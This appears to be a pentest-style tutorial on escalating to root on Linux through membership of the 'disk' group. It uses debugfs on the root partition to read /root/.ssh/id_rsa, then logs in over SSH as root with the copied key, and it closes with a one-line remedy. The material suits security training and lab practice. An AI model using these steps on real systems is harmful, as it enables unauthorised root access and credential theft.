The disk group gives the user full access to any block devices contained within /dev/. Since /dev/sda1 will in general be the global file-system, and the disk group will have full read-write privileges to this device
Identify
1. Check the permissions on the current user
- Id
2. Using LinEnum script can also help (https://github.com/rebootuser/LinEnum)
- ./LinEnum.sh
3. List /dev devices owner and group owner
- ls -l /dev
4. You can also find the partitions owned by disk group
- find /dev -group disk
5. Also display the available partitions
- df -h
Exploitation
1. Knowing your user is part of the disk group we can use debugfs to enumerate the entire disk with effectively root level privileges. We also have full read-write access to the disk block files, so we can extricate these or write arbitrary data to them. With the disk group, we are effectively root, just in a roundabout way. We will explore the partition where the / (root) directory is mounted on in this case /dev/sda2
- debugfs /dev/sda2
2. Being in there we can write files, in our case this is read-only
- cd /root
- ls
- mkdir test
3. In this case as we don’t have write permissions, we can try to read the ssh keys
- cd /root/.ssh
- ls
- cat id_rsa
4. Copying the contents of this file in a new file in our local machine, and set proper permissions
- vi id_rsa
- chmod 600 id_rsa
5. Now using that key try to log into the server again
- ssh -i id_rsa root@192.168.244.181
Remedy
Try not to assign users into the disk group